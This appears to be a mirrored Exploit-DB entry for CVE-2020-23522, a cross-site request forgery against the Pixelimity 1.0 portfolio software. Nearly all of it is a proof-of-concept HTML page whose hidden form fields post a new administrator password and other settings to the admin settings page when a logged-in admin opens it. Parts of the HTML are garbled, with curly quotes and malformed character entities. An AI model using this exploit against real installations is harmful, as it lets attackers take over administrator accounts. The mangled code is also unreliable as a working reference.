Pixelimity 1.0 – ‘password’ Cross-Site Request Forgery

• Exploit Database
• 14 阅读

• 作者： Noth
  日期： 2021-02-03
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49519/

• # Exploit Title: Pixelimity 1.0 - 'password' Cross-Site Request Forgery
  # Date: 2020-06-03
  # Exploit Author: Noth
  # Vendor Homepage: https://github.com/pixelimity/pixelimity
  # Software Link: https://github.com/pixelimity/pixelimity
  # Version: v1.0
  # CVE : 2020-23522
  
  Pixelimity 1.0 has cross-site request forgery via the admin/setting.php data [Password] parameter.
  
  PoC :
  
  <html>
  <body>
  <script>history.pushState(",",'/')</script>
  <form action=“http://127.0.0.1/pixelimity-dev/admin/setting.php
  ” method=“POST”>
  <input type=“hidden” name=“submit&#95;setting” value=“Save&#32;Setting”/>
  <input type=“hidden” name=“data&#91;admin&#95;portfolio&#95;show&#93;”
  value=“5”/>
  <input type=“hidden” name=“data&#91;admin&#95;pages&#95;show&#93;”
  value=“5”/>
  <input type=“hidden” name=“admin&#91;data&#95;password&#93;”
  value=“456789”/>
  <input type=“hidden” name=“data&#91;site#95;name&#93;"
  value=“Pixelimity”/>
  <input type=“hidden” name=“data&#91;site&#95;name&#93;show&#93;”
  value=“My&#32;Online&#32;Portfolio”/>
  <input type=“hidden” name=“data&#91;home&#95;image&#95;size&#93” value=“5”/>
  <input type=“hidden” name=“ data&#91;single&#95;image&#95;image&#95;size#93
  ” value=“ 240&44;0&#44;0&44;auto ”/>
  <input type=“hidden” name=“data&#91;single&#95;image&#95;image&#95;size#93”
  value=“720&44;0&#44;0&44;auto”/>
  <input type=“submit” value=“Submit request”/>
  </form>
  </body>
  </html>